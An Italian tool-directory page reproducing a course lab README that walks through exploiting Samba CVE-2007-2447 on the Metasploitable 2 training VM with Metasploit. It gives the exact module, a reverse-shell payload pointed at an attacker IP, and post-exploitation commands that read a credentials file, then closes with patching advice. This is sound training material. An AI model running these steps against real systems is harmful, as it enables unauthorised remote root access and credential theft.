Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2 | Kitploit
Strumenti/GitHubGitHub/devinliggins14/smb-pentest-exploiting-cve-2007-2447-on-metasploitable-2
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitEsfiltrazione DatiPost-ExploitPenetration TestingCommand and ControlApprendimento e FormazioneLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubdevinliggins14/smb-pentest-exploiting-cve-2007-2447-on-metasploitable-2

SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2

Vedi Repository
1 anno faNon ancora revisionato

SMB-PenTest-Sfruttamento-di-CVE-2007-2447-su-Metasploitable-2

RedTeam-SMB-PenTest

linux bash

Descrizione


Questo progetto documenta un'attività di penetration testing svolta nell'ambito del corso CMIT 386 presso l'UMGC. L'obiettivo è sfruttare la vulnerabilità usermap_script di Samba SMB (CVE-2007-2447) su Metasploitable 2 utilizzando Metasploit da una VM di attacco Kali Linux. Questa prova di concetto dimostra come una vulnerabilità legacy possa portare alla compromissione totale del sistema, al furto di credenziali e all'esfiltrazione di dati.

Panoramica della vulnerabilità

La vulnerabilità risiede nel servizio Samba sulla porta 445, dove una gestione impropria dell'input nello script username map consente l'esecuzione remota di comandi senza autenticazione. Se sfruttata, consente agli attaccanti di ottenere una shell con privilegi di root.

Ambiente

Passaggi da seguire

1. Avvia Metasploit:

root@kitploit:~
msfconsole


Assicurati che sia la macchina attaccante sia la macchina vittima siano accese e in esecuzione.

2. Cerca l'exploit:

root@kitploit:~
search samba

3. Usa il modulo appropriato:

root@kitploit:~
use exploit/multi/samba/usermap_script

4. Imposta le opzioni richieste:

root@kitploit:~
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse

5. Esegui l'exploit:

root@kitploit:~
exploit

6. Comandi post-esploitazione:

root@kitploit:~
whoami
hostname
cd /redteam7/student3
cat mypass.txt

Istruzioni di ripristino

Se la sessione si blocca o si interrompe:

Ripristina Metasploit:

root@kitploit:~
# Leave current shell
Ctrl C
exit
# Kill all background jobs
sessions -K             
jobs -K
# Restart Metasploit
msfconsole              

Concetti chiave

  • I servizi legacy come Samba 3.0.20 con usermap_script sono estremamente vulnerabili.
  • Sfruttare questa vulnerabilità SMB consente di ottenere una shell con privilegi di root.
  • I dati critici possono essere recuperati con semplici comandi, dimostrando un rischio reale.
  • Questo dimostra la necessità di applicare patch, segmentare la rete e ridurre l'esposizione dei servizi.

Raccomandazioni

  • Applica patch o dismetti immediatamente i sistemi legacy.
  • Implementa una segmentazione di rete rigorosa e regole firewall.
  • Limita l'esposizione di SMB ai soli utenti interni autenticati.
  • Monitora i log per attività sospette e movimenti laterali.

Riferimenti

  • Metasploit Samba usermap_script
  • Dettagli CVE-2007-2447
  • Indice exploit Metasploitable 2
Scarica lo strumento
ComponenteDettagli
VM attaccanteKali Linux
VM vittimaMetasploitable 2
Porta di destinazione445 (Samba/SMB)
Exploit utilizzatoexploit/multi/samba/usermap_script
Obiettivo credenziali/redteam7/student3/mypass.txt